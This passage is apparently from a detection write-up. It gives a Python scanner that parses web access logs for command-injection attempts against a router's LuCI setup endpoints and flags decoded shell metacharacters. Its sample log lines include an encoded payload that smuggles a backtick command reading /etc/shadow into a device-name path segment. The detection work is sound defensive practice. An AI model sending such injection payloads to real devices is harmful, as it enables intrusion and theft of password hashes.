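    '10.0.0.5 - - [21/Apr/2020:10:00:09 +0000] "GET /cgi-bin/luci/er/diag_set_device_name/%27%60cat%24%7BIFS%7D%2Fetc%2Fshadow%60%27/ HTTP/1.1" 200 0',
    '192.168.1.11 - - [21/Apr/2020:10:00:12 +0000] "GET /cgi-bin/luci/admin/system?x=%60 HTTP/1.1" 403 0',
]


def decode(component: str) -> str:
    """Percent-decode twice so a double-encoded backtick (%2560) is still caught."""
    return unquote(unquote(component))


def suspicious_fields(target: str):
    """Return [(location, decoded_value)] for every component of the request
    target that carries shell metacharacters, or [] if the request is
    outside the vulnerable prefix or clean. Components are split on the raw
    (still encoded) text so an encoded '&' or '/' inside a value cannot hide
    a payload by changing where the split happens."""
    raw_path, _, raw_query = target.partition("?")
    if not raw_path.startswith(ER_PREFIX):
        return []
    hits = []
    # diag_* endpoints take their arguments as path segments (see the payload list).
    for segment in raw_path[len(ER_PREFIX):].split("/"):
        value = decode(segment)
        if SHELL_META.search(value):
            hits.append(("path", value))
    for pair in (raw_query.split("&") if raw_query else []):
        key, _, raw_value = pair.partition("=")
        value = decode(raw_value)
        if SHELL_META.search(value):
            hits.append((decode(key), value))
    return hits


def value_allowed(value: str) -> bool:
    """The positive check a fixed handler would apply: reject anything outside
    the allowlist instead of trying to strip metacharacters."""
    return ALLOWED_VALUE.fullmatch(value) is not None


def scan_access_log(lines):
    """Parse CLF lines and return one finding per request that looks like an
    injection attempt: {'ip', 'target', 'status', 'hits'}."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed format; skip rather than guess
        hits = suspicious_fields(m.group("target"))
        if hits:
            findings.append({"ip": m.group("ip"), "target": m.group("target"),
                             "status": m.group("status"), "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["target"])
        for where, value in finding["hits"]:
            print("    ", where, "->", repr(value))
```

A 200 status on a flagged request does not by itself mean the command ran: the vendor's note in the description says the setup-mode endpoints are only reachable before initial configuration, so pair a hit with the device's configuration state (and, for the register/email payload, the contents of /cgi-bin/luci/er/get_syslog) before treating it as a confirmed compromise.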